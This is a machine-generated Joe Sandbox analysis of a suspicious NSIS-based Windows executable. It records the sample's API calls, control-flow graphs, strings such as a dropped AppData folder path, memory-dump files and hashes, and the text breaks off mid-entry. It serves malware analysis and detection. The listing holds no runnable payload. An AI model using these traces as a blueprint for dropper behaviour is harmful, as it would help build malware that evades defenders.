                                                                                • Opcode Fuzzy Hash: 00247a6464f5c3c901f3e71bb549cec16c26b63cf5655e6d63979758284adbde
                                                                                • Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 634 403027-40303e 635 403040 634->635 636 403047-403050 634->636 635->636 637 403052 636->637 638 403059-40305e 636->638 637->638 639 403060-403069 call 403258 638->639 640 40306e-40307b call 403242 638->640 639->640 644 403230 640->644 645 403081-403085 640->645 646 403232-403233 644->646 647 4031db-4031dd 645->647 648 40308b-4030d4 GetTickCount 645->648 651 40323b-40323f 646->651 649 40321d-403220 647->649 650 4031df-4031e2 647->650 652 403238 648->652 653 4030da-4030e2 648->653 657 403222 649->657 658 403225-40322e call 403242 649->658 650->652 654 4031e4 650->654 652->651 655 4030e4 653->655 656 4030e7-4030f5 call 403242 653->656 660 4031e7-4031ed 654->660 655->656 656->644 668 4030fb-403104 656->668 657->658 658->644 666 403235 658->666 663 4031f1-4031ff call 403242 660->663 664 4031ef 660->664 663->644 671 403201-40320d call 405cd7 663->671 664->663 666->652 670 40310a-40312a call 406549 668->670 676 403130-403143 GetTickCount 670->676 677 4031d3-4031d5 670->677 678 4031d7-4031d9 671->678 679 40320f-403219 671->679 680 403145-40314d 676->680 681 40318e-403190 676->681 677->646 678->646 679->660 684 40321b 679->684 685 403155-403186 MulDiv wsprintfW call 4051af 680->685 686 40314f-403153 680->686 682 403192-403196 681->682 683 4031c7-4031cb 681->683 688 403198-40319f call 405cd7 682->688 689 4031ad-4031b8 682->689 683->653 690 4031d1 683->690 684->652 691 40318b 685->691 686->681 686->685 694 4031a4-4031a6 688->694 693 4031bb-4031bf 689->693 690->652 691->681 693->670 695 4031c5 693->695 694->678 696 4031a8-4031ab 694->696 695->652 696->693
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CountTick$wsprintf
                                                                                • String ID: ... %d%%$@
                                                                                • API String ID: 551687249-3859443358
                                                                                • Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                • Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
                                                                                • Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                • Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 697 40567e-4056c9 CreateDirectoryW 698 4056cb-4056cd 697->698 699 4056cf-4056dc GetLastError 697->699 700 4056f6-4056f8 698->700 699->700 701 4056de-4056f2 SetFileSecurityW 699->701 701->698 702 4056f4 GetLastError 701->702 702->700
                                                                                APIs
                                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                • GetLastError.KERNEL32 ref: 004056D5
                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
                                                                                • GetLastError.KERNEL32 ref: 004056F4
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
                                                                                • C:\Users\user\Desktop, xrefs: 0040567E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                • API String ID: 3449924974-1521822154
                                                                                • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                                                • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 703 4063ba-4063da GetSystemDirectoryW 704 4063dc 703->704 705 4063de-4063e0 703->705 704->705 706 4063f1-4063f3 705->706 707 4063e2-4063eb 705->707 709 4063f4-406427 wsprintfW LoadLibraryExW 706->709 707->706 708 4063ed-4063ef 707->708 708->709
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                • wsprintfW.USER32 ref: 0040640C
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                • API String ID: 2200240437-1946221925
                                                                                • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                                                • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 710 405c54-405c60 711 405c61-405c95 GetTickCount GetTempFileNameW 710->711 712 405ca4-405ca6 711->712 713 405c97-405c99 711->713 715 405c9e-405ca1 712->715 713->711 714 405c9b 713->714 714->715
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405C72
                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
                                                                                • nsa, xrefs: 00405C61
                                                                                • "C:\Users\user\Desktop\WtZl31OLfA.exe", xrefs: 00405C54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                • API String ID: 1716503409-3421336162
                                                                                • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                • Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
                                                                                • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                • Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 716 402bff-402c28 RegOpenKeyExW 717 402c93-402c97 716->717 718 402c2a-402c35 716->718 719 402c50-402c60 RegEnumKeyW 718->719 720 402c62-402c74 RegCloseKey call 40642a 719->720 721 402c37-402c3a 719->721 729 402c76-402c85 720->729 730 402c9a-402ca0 720->730 722 402c87-402c8a RegCloseKey 721->722 723 402c3c-402c4e call 402bff 721->723 725 402c90-402c92 722->725 723->719 723->720 725->717 729->717 730->725 731 402ca2-402cb0 RegDeleteKeyW 730->731 731->725 733 402cb2 731->733 733->717
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Close$DeleteEnumOpen
                                                                                • String ID:
                                                                                • API String ID: 1912718029-0
                                                                                • Opcode ID: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                                                • Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
                                                                                • Opcode Fuzzy Hash: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                                                • Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 734 401bdf-401bf7 call 402ba2 * 2 739 401c03-401c07 734->739 740 401bf9-401c00 call 402bbf 734->740 741 401c13-401c19 739->741 742 401c09-401c10 call 402bbf 739->742 740->739 745 401c1b-401c2f call 402ba2 * 2 741->745 746 401c5f-401c89 call 402bbf * 2 FindWindowExW 741->746 742->741 758 401c31-401c4d SendMessageTimeoutW 745->758 759 401c4f-401c5d SendMessageW 745->759 757 401c8f 746->757 760 401c92-401c95 757->760 758->760 759->757 761 401c9b 760->761 762 402a4c-402a5b 760->762 761->762
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Timeout
                                                                                • String ID: !
                                                                                • API String ID: 1777923405-2657877971
                                                                                • Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                • Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
                                                                                • Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                • Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                  • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,759223A0), ref: 0040520A
                                                                                  • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                • String ID: `OC
                                                                                • API String ID: 334405425-799166930
                                                                                • Opcode ID: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                • Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
                                                                                • Opcode Fuzzy Hash: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                • Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F47
                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
                                                                                • RegCloseKey.KERNELBASE(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F8B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: : Completed
                                                                                • API String ID: 3677997916-2954849223
                                                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                • Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
                                                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                • Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
                                                                                APIs
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                  • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,759223A0), ref: 0040520A
                                                                                  • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                  • Part of subcall function 00405730: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                  • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 3585118688-0
                                                                                • Opcode ID: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
                                                                                • Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
                                                                                • Opcode Fuzzy Hash: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
                                                                                • Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
                                                                                APIs
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                  • Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\neoimpressionism\Vekselformular,?,00000000,000000F0), ref: 00401645
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\neoimpressionism\Vekselformular, xrefs: 00401638
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
